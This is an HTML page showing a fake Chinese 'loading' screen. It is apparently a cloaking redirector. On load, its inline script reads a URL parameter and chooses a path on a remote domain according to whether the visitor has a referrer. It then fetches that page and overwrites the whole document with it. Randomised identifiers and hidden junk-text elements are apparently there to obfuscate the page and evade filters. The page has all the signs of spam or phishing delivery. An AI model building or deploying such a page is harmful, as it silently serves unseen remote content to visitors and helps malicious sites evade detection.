<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .k4ZLVs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .k4ZLVs .ovZMTqZGeb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .k4ZLVs .content {
            line-height: 50px;
            text-align: center
        }

        .k4ZLVs .img {
            width: 100%
        }

        .k4ZLVs .bhNU4RPBXbh {
            text-align: center
        }

        .k4ZLVs .bhNU4RPBXbh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .k4ZLVs .bhNU4RPBXbh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .k4ZLVs .bhNU4RPBXbh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .k4ZLVs .bhNU4RPBXbh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .k4ZLVs .bhNU4RPBXbh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .k4ZLVs .bhNU4RPBXbh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .k4ZLVs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qbH2LW0wOUY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oOaWp3V = qbH2LW0wOUY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oOaWp3V +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oOaWp3V +".html?a=share";
		}
		
        xeqB8O99Ye=url+"#"+new Date().getTime();
        xeqB8O99Ye && function() {
            $.get(xeqB8O99Ye, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >NeMMfzwHn827UbEB222oUWMn8FsqOLIbnwUuBuvwCH5HPQKWMezbGrSJIc8VuYTqRcerjlQ9XtzAB2s8WK</li>
<h1 style='display:none' >Uk2onu2E7SRj74syEOzb0spuuXItP2DhZb3Q8</h1>
<h1 style='display:none' >Uk2onu2E7SRj74syEOzb0spuuXItP2DhZb3Q8</h1><div class="k4ZLVs">
    <div class="ovZMTqZGeb">
        <div class="bhNU4RPBXbh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Sdln93gRPcHVEXKxh</p>
<a  href='#' style='display:none'>j56PA12KT08T3ix5aWQ3UXYJo</a>
<p  style='display:none'>Sdln93gRPcHVEXKxh</p>
<b style='display:none' >k9g4dWi2EzpwGWPdVgLcUC51EU3WkRho01zmtaKi9AyoKiHOZTJED0BUPU7HJdMVjTC2fE</b>
<b style='display:none' >k9g4dWi2EzpwGWPdVgLcUC51EU3WkRho01zmtaKi9AyoKiHOZTJED0BUPU7HJdMVjTC2fE</b>
<span style='display:none'>NzeYNZEY4zXiSfa4WnK3Gjbu8OJZPtEMctPTEXRZ4CpvU6aynBs</span>
<img  src='' style='display:none'></body>
</html>